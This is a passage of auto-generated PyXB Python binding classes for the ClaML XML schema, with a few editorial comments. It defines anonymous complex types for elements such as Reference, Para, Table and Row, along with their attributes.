__kind._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 224, 12)
kind = property(__kind.value, __kind.set, None, None)
# Attribute usage uses Python identifier usage
__usage = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'usage'), 'usage', '__AbsentNamespace0_CTD_ANON_19_usage', pyxb.binding.datatypes.IDREF)
__usage._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 225, 12)
__usage._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 225, 12)
usage = property(__usage.value, __usage.set, None, None)
_ElementMap.update({
__Label.name() : __Label,
__History.name() : __History
})
_AttributeMap.update({
__id.name() : __id,
__kind.name() : __kind,
__usage.name() : __usage
})
_module_typeBindings.CTD_ANON_19 = CTD_ANON_19
# Complex type [anonymous] with content type MIXED
class CTD_ANON_20 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 229, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Reference uses Python identifier Reference
__Reference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Reference'), 'Reference', '__AbsentNamespace0_CTD_ANON_20_Reference', True, pyxb.utils.utility.Location('ClaML.xsd', 254, 4), )
Reference = property(__Reference.value, __Reference.set, None, None)
# Element Para uses Python identifier Para
__Para = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Para'), 'Para', '__AbsentNamespace0_CTD_ANON_20_Para', True, pyxb.utils.utility.Location('ClaML.xsd', 264, 4), )
Para = property(__Para.value, __Para.set, None, None)
# Element Fragment uses Python identifier Fragment
__Fragment = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Fragment'), 'Fragment', '__AbsentNamespace0_CTD_ANON_20_Fragment', True, pyxb.utils.utility.Location('ClaML.xsd', 270, 4), )
Fragment = property(__Fragment.value, __Fragment.set, None, None)
# Element Include uses Python identifier Include
__Include = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Include'), 'Include', '__AbsentNamespace0_CTD_ANON_20_Include', True, pyxb.utils.utility.Location('ClaML.xsd', 285, 4), )
Include = property(__Include.value, __Include.set, None, None)
# Element IncludeDescendants uses Python identifier IncludeDescendants
__IncludeDescendants = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'IncludeDescendants'), 'IncludeDescendants', '__AbsentNamespace0_CTD_ANON_20_IncludeDescendants', True, pyxb.utils.utility.Location('ClaML.xsd', 291, 4), )
IncludeDescendants = property(__IncludeDescendants.value, __IncludeDescendants.set, None, None)
# Element List uses Python identifier List
__List = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'List'), 'List', '__AbsentNamespace0_CTD_ANON_20_List', True, pyxb.utils.utility.Location('ClaML.xsd', 297, 4), )
List = property(__List.value, __List.set, None, None)
# Element Table uses Python identifier Table
__Table = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Table'), 'Table', '__AbsentNamespace0_CTD_ANON_20_Table', True, pyxb.utils.utility.Location('ClaML.xsd', 317, 4), )
Table = property(__Table.value, __Table.set, None, None)
# Element Term uses Python identifier Term
__Term = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Term'), 'Term', '__AbsentNamespace0_CTD_ANON_20_Term', True, pyxb.utils.utility.Location('ClaML.xsd', 380, 4), )
Term = property(__Term.value, __Term.set, None, None)
# Attribute {http://www.w3.org/XML/1998/namespace}lang uses Python identifier lang
__lang = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(pyxb.namespace.XML, 'lang'), 'lang', '__AbsentNamespace0_CTD_ANON_20_httpwww_w3_orgXML1998namespacelang', pyxb.binding.xml_.STD_ANON_lang, required=True)
__lang._DeclarationLocation = None
__lang._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 231, 12)
lang = property(__lang.value, __lang.set, None, None)
# Attribute {http://www.w3.org/XML/1998/namespace}space uses Python identifier space
__space = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(pyxb.namespace.XML, 'space'), 'space', '__AbsentNamespace0_CTD_ANON_20_httpwww_w3_orgXML1998namespacespace', pyxb.binding.xml_.STD_ANON_space, unicode_default='default')
__space._DeclarationLocation = None
__space._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 232, 12)
space = property(__space.value, __space.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_20_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 233, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 233, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
__Reference.name() : __Reference,
__Para.name() : __Para,
__Fragment.name() : __Fragment,
__Include.name() : __Include,
__IncludeDescendants.name() : __IncludeDescendants,
__List.name() : __List,
__Table.name() : __Table,
__Term.name() : __Term
})
_AttributeMap.update({
__lang.name() : __lang,
__space.name() : __space,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_20 = CTD_ANON_20
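
# Editorial note: xml:space carries unicode_default='default' (above), so an
# instance that never sets it still reports space == 'default'; documents opt
# into whitespace preservation with xml:space="preserve".
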
# Complex type [anonymous] with content type MIXED
class CTD_ANON_21 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 237, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute author uses Python identifier author
__author = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'author'), 'author', '__AbsentNamespace0_CTD_ANON_21_author', pyxb.binding.datatypes.IDREF, required=True)
__author._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 238, 12)
__author._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 238, 12)
author = property(__author.value, __author.set, None, None)
# Attribute date uses Python identifier date
__date = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'date'), 'date', '__AbsentNamespace0_CTD_ANON_21_date', pyxb.binding.datatypes.NMTOKEN, required=True)
__date._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 239, 12)
__date._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 239, 12)
date = property(__date.value, __date.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__author.name() : __author,
__date.name() : __date
})
_module_typeBindings.CTD_ANON_21 = CTD_ANON_21
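
# Editorial note: the XSD locations (element at ClaML.xsd line 236, type at
# line 237) suggest this is the History element's type; both 'author' and
# 'date' are required, so they are always populated on a schema-valid instance.
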
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_22 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 243, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_22_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 244, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 244, 12)
code = property(__code.value, __code.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_22_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 245, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 245, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__code.name() : __code,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_22 = CTD_ANON_22
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_23 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 249, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_23_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 250, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 250, 12)
code = property(__code.value, __code.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_23_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 251, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 251, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__code.name() : __code,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_23 = CTD_ANON_23
# Complex type [anonymous] with content type MIXED
class CTD_ANON_24 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 255, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_24_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 256, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 256, 12)
class_ = property(__class.value, __class.set, None, None)
# Attribute authority uses Python identifier authority
__authority = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'authority'), 'authority', '__AbsentNamespace0_CTD_ANON_24_authority', pyxb.binding.datatypes.NMTOKEN)
__authority._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 257, 12)
__authority._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 257, 12)
authority = property(__authority.value, __authority.set, None, None)
# Attribute uid uses Python identifier uid
__uid = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'uid'), 'uid', '__AbsentNamespace0_CTD_ANON_24_uid', pyxb.binding.datatypes.NMTOKEN)
__uid._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 258, 12)
__uid._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 258, 12)
uid = property(__uid.value, __uid.set, None, None)
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_24_code', pyxb.binding.datatypes.NMTOKEN)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 259, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 259, 12)
code = property(__code.value, __code.set, None, None)
# Attribute usage uses Python identifier usage
__usage = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'usage'), 'usage', '__AbsentNamespace0_CTD_ANON_24_usage', pyxb.binding.datatypes.IDREF)
__usage._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 260, 12)
__usage._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 260, 12)
usage = property(__usage.value, __usage.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_24_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 261, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 261, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__class.name() : __class,
__authority.name() : __authority,
__uid.name() : __uid,
__code.name() : __code,
__usage.name() : __usage,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_24 = CTD_ANON_24
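
# Editorial note: the XML attribute 'class' becomes the Python identifier
# 'class_' because 'class' is a reserved word in Python; the same mangling
# recurs in the types below. Sketch, assuming `ref` is a CTD_ANON_24 instance
# (its content model matches the Reference element declared at ClaML.xsd
# line 254):
#
#   ref.class_, ref.code, ref.usage
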
# Complex type [anonymous] with content type MIXED
class CTD_ANON_25 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 265, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Reference uses Python identifier Reference
__Reference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Reference'), 'Reference', '__AbsentNamespace0_CTD_ANON_25_Reference', True, pyxb.utils.utility.Location('ClaML.xsd', 254, 4), )
Reference = property(__Reference.value, __Reference.set, None, None)
# Element Term uses Python identifier Term
__Term = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Term'), 'Term', '__AbsentNamespace0_CTD_ANON_25_Term', True, pyxb.utils.utility.Location('ClaML.xsd', 380, 4), )
Term = property(__Term.value, __Term.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_25_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 267, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 267, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__Reference.name() : __Reference,
__Term.name() : __Term
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_25 = CTD_ANON_25
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_26 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 286, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_26_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 287, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 287, 12)
class_ = property(__class.value, __class.set, None, None)
# Attribute rubric uses Python identifier rubric
__rubric = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rubric'), 'rubric', '__AbsentNamespace0_CTD_ANON_26_rubric', pyxb.binding.datatypes.IDREF, required=True)
__rubric._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 288, 12)
__rubric._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 288, 12)
rubric = property(__rubric.value, __rubric.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__class.name() : __class,
__rubric.name() : __rubric
})
_module_typeBindings.CTD_ANON_26 = CTD_ANON_26
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_27 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 292, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_27_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 293, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 293, 12)
code = property(__code.value, __code.set, None, None)
# Attribute kind uses Python identifier kind
__kind = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'kind'), 'kind', '__AbsentNamespace0_CTD_ANON_27_kind', pyxb.binding.datatypes.IDREF, required=True)
__kind._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 294, 12)
__kind._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 294, 12)
kind = property(__kind.value, __kind.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__code.name() : __code,
__kind.name() : __kind
})
_module_typeBindings.CTD_ANON_27 = CTD_ANON_27
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_28 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 298, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element ListItem uses Python identifier ListItem
__ListItem = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ListItem'), 'ListItem', '__AbsentNamespace0_CTD_ANON_28_ListItem', True, pyxb.utils.utility.Location('ClaML.xsd', 305, 4), )
ListItem = property(__ListItem.value, __ListItem.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_28_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 302, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 302, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__ListItem.name() : __ListItem
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_28 = CTD_ANON_28
# Complex type [anonymous] with content type MIXED
class CTD_ANON_29 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 306, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Reference uses Python identifier Reference
__Reference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Reference'), 'Reference', '__AbsentNamespace0_CTD_ANON_29_Reference', True, pyxb.utils.utility.Location('ClaML.xsd', 254, 4), )
Reference = property(__Reference.value, __Reference.set, None, None)
# Element Para uses Python identifier Para
__Para = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Para'), 'Para', '__AbsentNamespace0_CTD_ANON_29_Para', True, pyxb.utils.utility.Location('ClaML.xsd', 264, 4), )
Para = property(__Para.value, __Para.set, None, None)
# Element Include uses Python identifier Include
__Include = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Include'), 'Include', '__AbsentNamespace0_CTD_ANON_29_Include', True, pyxb.utils.utility.Location('ClaML.xsd', 285, 4), )
Include = property(__Include.value, __Include.set, None, None)
# Element List uses Python identifier List
__List = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'List'), 'List', '__AbsentNamespace0_CTD_ANON_29_List', True, pyxb.utils.utility.Location('ClaML.xsd', 297, 4), )
List = property(__List.value, __List.set, None, None)
# Element Table uses Python identifier Table
__Table = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Table'), 'Table', '__AbsentNamespace0_CTD_ANON_29_Table', True, pyxb.utils.utility.Location('ClaML.xsd', 317, 4), )
Table = property(__Table.value, __Table.set, None, None)
# Element Term uses Python identifier Term
__Term = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Term'), 'Term', '__AbsentNamespace0_CTD_ANON_29_Term', True, pyxb.utils.utility.Location('ClaML.xsd', 380, 4), )
Term = property(__Term.value, __Term.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_29_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 314, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 314, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__Reference.name() : __Reference,
__Para.name() : __Para,
__Include.name() : __Include,
__List.name() : __List,
__Table.name() : __Table,
__Term.name() : __Term
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_29 = CTD_ANON_29
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_30 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 318, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Caption uses Python identifier Caption
__Caption = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Caption'), 'Caption', '__AbsentNamespace0_CTD_ANON_30_Caption', False, pyxb.utils.utility.Location('ClaML.xsd', 328, 4), )
Caption = property(__Caption.value, __Caption.set, None, None)
# Element THead uses Python identifier THead
__THead = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'THead'), 'THead', '__AbsentNamespace0_CTD_ANON_30_THead', False, pyxb.utils.utility.Location('ClaML.xsd', 334, 4), )
THead = property(__THead.value, __THead.set, None, None)
# Element TBody uses Python identifier TBody
__TBody = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TBody'), 'TBody', '__AbsentNamespace0_CTD_ANON_30_TBody', False, pyxb.utils.utility.Location('ClaML.xsd', 342, 4), )
TBody = property(__TBody.value, __TBody.set, None, None)
# Element TFoot uses Python identifier TFoot
__TFoot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TFoot'), 'TFoot', '__AbsentNamespace0_CTD_ANON_30_TFoot', False, pyxb.utils.utility.Location('ClaML.xsd', 350, 4), )
TFoot = property(__TFoot.value, __TFoot.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_30_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 325, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 325, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__Caption.name() : __Caption,
__THead.name() : __THead,
__TBody.name() : __TBody,
__TFoot.name() : __TFoot
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_30 = CTD_ANON_30
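
# Sketch (editorial): CTD_ANON_30 mirrors an HTML-style table. Caption, THead,
# TBody and TFoot are all declared non-plural here, so each is a single value
# (None when absent); THead and TBody bind to the Row-bearing types
# CTD_ANON_32 and CTD_ANON_33 below:
#
#   if table.TBody is not None:
#       for row in table.TBody.Row:
#           pass  # process the Row binding
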
# Complex type [anonymous] with content type MIXED
class CTD_ANON_31 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 329, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Reference uses Python identifier Reference
__Reference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Reference'), 'Reference', '__AbsentNamespace0_CTD_ANON_31_Reference', True, pyxb.utils.utility.Location('ClaML.xsd', 254, 4), )
Reference = property(__Reference.value, __Reference.set, None, None)
# Element Term uses Python identifier Term
__Term = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Term'), 'Term', '__AbsentNamespace0_CTD_ANON_31_Term', True, pyxb.utils.utility.Location('ClaML.xsd', 380, 4), )
Term = property(__Term.value, __Term.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_31_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 331, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 331, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__Reference.name() : __Reference,
__Term.name() : __Term
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_31 = CTD_ANON_31
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_32 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 335, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Row uses Python identifier Row
__Row = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Row'), 'Row', '__AbsentNamespace0_CTD_ANON_32_Row', True, pyxb.utils.utility.Location('ClaML.xsd', 358, 4), )
Row = property(__Row.value, __Row.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_32_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 339, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 339, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__Row.name() : __Row
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_32 = CTD_ANON_32
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_33 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 343, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Row uses Python identifier Row
__Row = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Row'), 'Row', '__AbsentNamespace0_CTD_ANON_33_Row', True, pyxb.utils.utility.Location('ClaML.xsd', 358, 4), )
Row = property(__Row.value, __Row.set, None, None)
# Attribute class uses Python identifier class_
__class = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'class'), 'class_', '__AbsentNamespace0_CTD_ANON_33_class', pyxb.binding.datatypes.anySimpleType)
__class._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 347, 12)
__class._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 347, 12)
class_ = property(__class.value, __class.set, None, None)
_ElementMap.update({
__Row.name() : __Row
})
_AttributeMap.update({
__class.name() : __class
})
_module_typeBindings.CTD_ANON_33 = CTD_ANON_33
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_34 (pyxb.binding.basis.complexTypeDefinition):
